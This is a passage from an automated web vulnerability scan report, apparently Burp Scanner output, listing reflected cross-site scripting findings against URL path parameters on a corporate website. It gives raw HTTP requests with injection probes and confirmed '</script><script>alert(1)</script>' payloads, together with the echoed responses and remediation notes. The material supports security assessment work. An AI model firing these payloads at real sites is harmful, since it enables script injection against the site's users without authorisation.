<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<url>/resources/1002a2a14-111-Unified+Communications+and+Collaboration.xml7a467</script><script>alert(1)</script>a526a97ff5a</url>
...[SNIP]...

1.600. http://www.verizonbusiness.com/resources/1002a2a14-111-Unified+Communications+and+Collaboration.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a14-111-Unified+Communications+and+Collaboration.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fab23'%3bfab3e9da16d was submitted in the REST URL parameter 2. This input was echoed as fab23';fab3e9da16d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/fab23'%3bfab3e9da16d HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:28:18 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40210
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:28:18 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:28:18 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources/fab23';fab3e9da16d'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.601. http://www.verizonbusiness.com/resources/1002a2a15-111-Connecting+Business+Information.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a15-111-Connecting+Business+Information.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 37e29"%3bc69daeaea42 was submitted in the REST URL parameter 1. This input was echoed as 37e29";c69daeaea42 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources37e29"%3bc69daeaea42/1002a2a15-111-Connecting+Business+Information.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:19:50 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40698
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:19:50 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:19:50 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources37e29";c69daeaea42/1002a2a15-111-Connecting+Business+Information.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VA
...[SNIP]...

1.602. http://www.verizonbusiness.com/resources/1002a2a15-111-Connecting+Business+Information.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a15-111-Connecting+Business+Information.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 15d90'%3b68b20facfe5 was submitted in the REST URL parameter 1. This input was echoed as 15d90';68b20facfe5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources15d90'%3b68b20facfe5/1002a2a15-111-Connecting+Business+Information.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:20:07 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40698
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:20:07 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:20:07 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources15d90';68b20facfe5/1002a2a15-111-Connecting+Business+Information.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.603. http://www.verizonbusiness.com/resources/1002a2a15-111-Connecting+Business+Information.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a15-111-Connecting+Business+Information.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9664'%3b028b97753fe was submitted in the REST URL parameter 2. This input was echoed as e9664';028b97753fe in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/e9664'%3b028b97753fe HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:21:59 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40210
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:21:59 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:21:59 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/e9664';028b97753fe'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.604. http://www.verizonbusiness.com/resources/1002a2a15-111-Connecting+Business+Information.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a15-111-Connecting+Business+Information.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73a0a</script><script>alert(1)</script>15933b63430 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a2a15-111-Connecting+Business+Information.xml73a0a</script><script>alert(1)</script>15933b63430 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "4fdbb90af8ee43c342b3b09402fa4462"
Last-Modified: Wed, 17 Nov 2010 00:21:58 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:21:58 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3d156b62a8-e540-49ec-abde-b14768740bfd|VTID%3ddb8885e4-f1a5-4e8a-a5a5-d66f73ede1ff|SX%3d1289954517|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:25:41 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:21:58 GMT
Content-Length: 32800

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<url>/resources/1002a2a15-111-Connecting+Business+Information.xml73a0a</script><script>alert(1)</script>15933b63430</url>
...[SNIP]...

1.605. http://www.verizonbusiness.com/resources/1002a2a16-111-Controlling+Costs.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a16-111-Controlling+Costs.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80ad5'%3b2116b6d17be was submitted in the REST URL parameter 1. This input was echoed as 80ad5';2116b6d17be in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources80ad5'%3b2116b6d17be/1002a2a16-111-Controlling+Costs.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:19:53 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40670
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:19:53 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:19:53 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources80ad5';2116b6d17be/1002a2a16-111-Controlling+Costs.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.606. http://www.verizonbusiness.com/resources/1002a2a16-111-Controlling+Costs.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a16-111-Controlling+Costs.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f3537"%3b4fa2b8d26d0 was submitted in the REST URL parameter 1. This input was echoed as f3537";4fa2b8d26d0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesf3537"%3b4fa2b8d26d0/1002a2a16-111-Controlling+Costs.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:19:39 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40670
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:19:39 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:19:39 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resourcesf3537";4fa2b8d26d0/1002a2a16-111-Controlling+Costs.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIM
...[SNIP]...

1.607. http://www.verizonbusiness.com/resources/1002a2a16-111-Controlling+Costs.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a16-111-Controlling+Costs.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb68e'%3b99175b8f49f was submitted in the REST URL parameter 2. This input was echoed as eb68e';99175b8f49f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/eb68e'%3b99175b8f49f HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:21:33 GMT
Content-Type: text/html
Content-Length: 40210
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:21:33 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:21:33 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources/eb68e';99175b8f49f'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.608. http://www.verizonbusiness.com/resources/1002a2a16-111-Controlling+Costs.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a16-111-Controlling+Costs.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1ba1</script><script>alert(1)</script>68d431132d7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a2a16-111-Controlling+Costs.xmle1ba1</script><script>alert(1)</script>68d431132d7 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "8cdaf24f91208cae384d11d4276acce9"
Last-Modified: Wed, 17 Nov 2010 00:21:32 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:21:32 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3d0ee01539-26be-4114-ac5c-8d9c02250973|VTID%3d1f91dc4c-f9bf-4ce8-8c39-d86bf644d609|SX%3d1289954492|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:25:16 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:21:32 GMT
Content-Length: 33092

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<url>/resources/1002a2a16-111-Controlling+Costs.xmle1ba1</script><script>alert(1)</script>68d431132d7</url>
...[SNIP]...

1.609. http://www.verizonbusiness.com/resources/1002a2a17-111-Expanding+Into+New+Markets.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a17-111-Expanding+Into+New+Markets.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3c8f6"%3b53d1640dba6 was submitted in the REST URL parameter 1. This input was echoed as 3c8f6";53d1640dba6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources3c8f6"%3b53d1640dba6/1002a2a17-111-Expanding+Into+New+Markets.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:23:04 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40688
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:23:04 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:23:04 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources3c8f6";53d1640dba6/1002a2a17-111-Expanding+Into+New+Markets.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDAT
...[SNIP]...

1.610. http://www.verizonbusiness.com/resources/1002a2a17-111-Expanding+Into+New+Markets.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a17-111-Expanding+Into+New+Markets.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fb52e'%3bf0bebafbc0e was submitted in the REST URL parameter 1. This input was echoed as fb52e';f0bebafbc0e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesfb52e'%3bf0bebafbc0e/1002a2a17-111-Expanding+Into+New+Markets.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:23:17 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40690
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:23:17 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:23:17 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/resourcesfb52e';f0bebafbc0e/1002a2a17-111-Expanding+Into+New+Markets.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.611. http://www.verizonbusiness.com/resources/1002a2a17-111-Expanding+Into+New+Markets.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a17-111-Expanding+Into+New+Markets.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c7f3a'%3b5b361af62df was submitted in the REST URL parameter 2. This input was echoed as c7f3a';5b361af62df in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/c7f3a'%3b5b361af62df HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:24:06 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40210
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:24:06 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:24:06 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources/c7f3a';5b361af62df'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.612. http://www.verizonbusiness.com/resources/1002a2a17-111-Expanding+Into+New+Markets.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a17-111-Expanding+Into+New+Markets.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9dbf0</script><script>alert(1)</script>b9e986f25bc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a2a17-111-Expanding+Into+New+Markets.xml9dbf0</script><script>alert(1)</script>b9e986f25bc HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "d8cc846bbcaaafee52d304b94de691dd"
Last-Modified: Wed, 17 Nov 2010 00:23:55 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:23:55 GMT
Content-Length: 31145
Connection: close
